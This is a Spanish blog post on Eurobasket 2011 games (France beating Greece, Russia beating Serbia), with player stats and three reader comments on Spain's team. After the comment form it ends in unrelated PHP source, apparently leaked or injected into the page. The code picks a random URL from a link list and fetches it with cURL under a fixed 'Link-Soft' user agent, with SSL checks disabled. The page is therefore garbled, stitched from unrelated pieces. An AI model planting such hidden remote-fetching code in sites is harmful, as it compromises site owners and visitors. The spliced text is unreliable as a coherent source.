Eurobasket 2011: Camino de Rosas

16 de September de 2011 por TheDeerHunter

El premio para Francia tras la maniobra que alegremente prepararon el otro día, empezaban a degustarlo ayer con un ligero aperitivo contra Grecia. Hoy toca el plato principal contra Rusia que veremos si les deja con ganas de tomar postre.

Francia 64 – Grecia 56: Nos hubiera gustado saber qué es lo que les estaría pasando por la cabeza a los franceses cuando entraban en el último cuarto 5 abajo y el terreno embarrado al que les habían llevado los griegos. El choque parecía que se iba a decidir por debajo de los 60 puntos, que ni de lejos es lo que a ellos les beneficiaba. Se puede decir que podían agradecer su suerte porque los tiradores griegos no estuvieran mínimamente acertados. Apenas un 14% desde el triple cuando habían estado lanzando en torno a un modesto 30% durante el torneo. Con ese porcentaje Francia ya hubiera podido ir olvidándose de las semifinales.

Y hasta ese momento Parker las estaba pasando canutas. Y Noah y Diaw no podían con Bourousis. Se puede decir que nuevamente De Colo sostuvo el equipo en el peor momento y dos triples de Batum en ese impás del 5 abajo más un par de canastas, esta vez sí, de Parker, abrieron la lata. Francia ya no perdería la iniciativa hasta el final gracias a su trío exterior muy superior al heleno.

Destacados NBA: Tony Parker 18 ptos, 5 reb, 3 asis, 2 rob; Nicolas Batum 15 ptos, 2 reb, 1 asis, 1 rob, 1 tap
Destacados resto: Nando De Colo 16 ptos, 2 reb, 1 asis, 1 rob, 1 tap
Ioannis Bourousis 17 ptos, 11 reb, 2 tap, 2 rob
Rusia 77 – Serbia 67: Se confirma la sensación de incapacidad que ha ofrecido Serbia durante todo el torneo. Será casi imposible verles los próximos juegos. Fue un querer y no poder contra una Rusia sin fisuras, superior en casi todos los aspectos del juego. El nivel de Rusia lo personifica Kirilenko. Ayer cuajó un partido total, rotundo en todas las facetas estadísticas y haciendo sangre en la posición de 3 donde los serbios han mostrado mayores carencias. Por contra, decepcionante Teodosic, alejado del papel que debe  ejercer un líder y haciendo la guerra por su cuenta, más para maquillar que para otra cosa.

No es casualidad la imbatibilidad de Rusia y harán bien el resto de tomar nota.

Destacado NBA: Andrei Kirilenko 14 ptos, 11 reb, 6 asis, 4 rob, 2 tap

Comenta

3 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Se acabó el sueño macedonio, aunque como decía ayer Nacho, han jugado al baloncesto de toda la vida en estático, pases dentro fuera y combinando en el perímetro buscando la esquina o el centro con Pero Antic, e incluso después de todas esas jugadas, aún les quedaba tiempo para meter un pase fácil al tío dentro de la zona. Ha sido complicado, porque en el tercer cuarto nos ganaban de tres, impresionante demostración de entradas a canastas de McCalebb, hoy ha dado un clinic, y en España han estado todos a un gran nivel (excepto Rudy, al que la posición de tres no le está viniendo nada bien). A mi me parece que jugaba mejor los torneos en los que era suplente de Navarro, pero las circunstancias son las que son y Scariolo lo pone ahí; no confía en nadie más para el puesto de alero. Pone antes a Llull que a San Eme o Claver, que han pasado de incógnitos este partido. Felipe creo que ha jugado cinco segundos. Y para eso tanta lista definitiva y tanta pamplina? En fin. Por lo menos hemos sabido reaccionar, ya que la primera parte estaba siendo favorita Macedonia, y nos hemos sobrepuesto a las injusticias arbitrales. A Pau le han pegado hasta en el carnet de identidad. Creo que somos favoritos el domingo, se ponga quien se ponga. Me parece que Rusia es bastante superior a Francia. Veremos que pasa esta tarde

      Citar

  2. Denise dice:
    #2

    Creo que las rotaciones de Scariolo son acertadisimas, de hecho cuando sale la segunda unidad, vaya si se nota.

      Citar

  3. Nacho dice:
    #3

    Bueno, San Emeterio hizo dios muy buenos partidos y ayer no rascó bola.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>